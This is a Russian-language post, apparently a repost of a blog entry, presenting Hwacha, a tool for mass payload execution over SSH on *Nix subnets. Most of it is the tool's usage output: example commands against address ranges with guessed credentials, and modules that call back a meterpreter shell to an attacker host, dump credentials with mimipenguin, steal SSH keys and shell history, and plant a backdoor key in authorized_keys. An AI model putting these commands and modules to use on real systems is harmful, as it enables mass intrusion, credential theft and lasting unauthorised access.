
Развертывайте полезные нагрузки на системы *Nix массово

https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/
Hwacha — это инструмент для быстрого выполнения полезных нагрузок в системах на базе *Nix. Позволяет легко собирать артефакты или выполнять шелл-код на целой подсети систем, для которых получены учётные данные.
$python hwacha.py
&&&& && && &&
&&&&&&&&&&&& && && && Created by Esteban Rodriguez /~~\_
&&&&&& && &&&&&&&&&& && Web: https://www.n00py.io /| '` *\
&& && &&&&& && &&&&& Twitter: @n00py1 \| ___/
&& && &&&&& && && &&&&& _ _ _
&& && && && && && | | | | | |
&&&&&& && &&& &&& && | |_| |__ ____ _ ___| |__ __ _
&& && && && && | _ |\ \ /\ / / _` |/ __| '_ \ / _` |
&&&&&&&&&&&&&&& && | | | | \ V V / (_| | (__| | | | (_| |
&& && \_| |_/ \_/\_/ \__,_|\___|_| |_|\__,_|
To run commands, use -x [COMMAND]
to run modules, use -m [MODULE]
to specify module options, use -o [ARG=ARG ARG=ARG]
to see all available modules, use -L
Example usage:
python hwacha.py -t 192.168.1.1/24 -u admin -p password
python hwacha.py -t 192.168.1.100-200 -u admin -p password -m keys
python hwacha.py -t 192.168.1.100-200 -u admin -i loot/keys/192.168.1.101/id_rsa -x id
python hwacha.py -t 192.168.1.123 -u admin -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"
Доступные модули:
[*] meterpreter Используется для запуска агента meterpreter на целевых системах.
ОБЯЗАТЕЛЬНЫЕ АРГУМЕНТЫ: LHOST , LPORT
НЕОБЯЗАТЕЛЬНЫЕ АРГУМЕНТЫ: TYPE {python, php, 32, 64, osx}
[*] mimipenguin Используется для выполнения mimipenguin на целевых системах с целью восстановления учётных данных. (Требуются права root)
НЕОБЯЗАТЕЛЬНЫЕ АРГУМЕНТЫ: LISTEN
[*] keys Используется для сбора закрытых SSH-ключей с целевых систем.
[*] history Используется для сбора файлов истории командной оболочки с целевых систем.
[*] privs Используется для перечисления привилегий sudo на целевых системах.
[*] backdoor Создаёт пару RSA-ключей и добавляет открытый ключ в файл authorized_keys на целевых системах.
[*] web_delivery Используется для выполнения Python-скрипта на целевых системах.
ОБЯЗАТЕЛЬНЫЕ АРГУМЕНТЫ: PATH
НЕОБЯЗАТЕЛЬНЫЕ АРГУМЕНТЫ: LISTEN
[*] custom_bin Используется для выполнения пользовательского бинарного файла на целевых системах.
ОБЯЗАТЕЛЬНЫЕ АРГУМЕНТЫ: PATH
[*] sudo_exec Используется для выполнения пользовательского бинарного файла (с помощью sudo) на целевых системах.
ОБЯЗАТЕЛЬНЫЕ АРГУМЕНТЫ: PATH
[*] shellcode Используется для выполнения пользовательского шелл-кода на целевых системах.
ОБЯЗАТЕЛЬНЫЕ АРГУМЕНТЫ: PATH
Требуется paramiko:
pip install paramiko